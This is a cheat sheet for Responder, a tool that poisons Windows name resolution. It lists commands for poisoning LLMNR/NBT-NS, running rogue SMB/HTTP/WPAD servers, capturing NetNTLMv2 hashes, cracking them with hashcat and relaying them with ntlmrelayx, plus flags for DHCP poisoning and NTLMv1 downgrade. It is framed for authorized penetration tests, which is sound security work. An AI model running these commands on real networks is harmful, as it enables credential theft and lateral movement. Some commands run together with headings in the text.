Responder Cheat Sheet
LLMNR/NBT-NS/mDNS poisoner and rogue authentication server for capturing NetNTLM hashes on authorized Windows networks.
Overview
Responder answers broadcast name resolution queries and hosts rogue SMB/HTTP servers to capture NetNTLMv2 hashes for offline cracking or relay—core tool for authorized Active Directory internal assessments.
Critical: Running Responder on production networks without explicit written approval can disrupt authentication and violate law and policy. Use only in lab or client-authorized penetration tests. Disable SMB and HTTP servers when using with ntlmrelayx to avoid poisoning your own relay.
Install
sudo apt install -y responderor
git clone https://github.com/lgandx/Responder.gitEssential commands
Analyze mode (no poisoning) — safe first step on new VLAN
sudo responder -I eth0 -AFull poisoners + rogue servers
sudo responder -I eth0 -wdCommon workflows
Capture hashes for cracking —
sudo responder -I eth0 -wfHashes: /usr/share/responder/logs/ or Responder/logs/
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txtResponder.conf: SMB = Off, HTTP = Off
sudo responder -I eth0 -vsudo ntlmrelayx.py -tf targets.txt -smb2supportWPAD rogue proxy —
sudo responder -I eth0 -wFSpecific analyze-only protocols —
sudo responder -I eth0 -A -vDHCP / ICMP options (advanced) —
sudo responder -I eth0 -P -vFlags reference
-I IF | Interface |
|---|---|
-A | Analyze mode (no poison) |
-w | Start WPAD rogue proxy |
-f | Fingerprint OS from NTLM |
-F | Force WPAD auth |
-v | Verbose |
-d | Enable DHCP poison |
-P | Force NTLM auth (HTTP/SMB) |
-r | Attempt to downgrade to NetNTLMv1 |
-b | Return basic HTTP auth vs NTLM |
Tips
- Always start with -A to observe broadcast volume before active poison.
- Turn off Responder servers when relaying to avoid capturing your own machine.
- Multicast name resolution should be disabled in hardened environments—document if no hashes appear.
- Pair captures with hashcat -m 5600 or relay to hosts without SMB signing.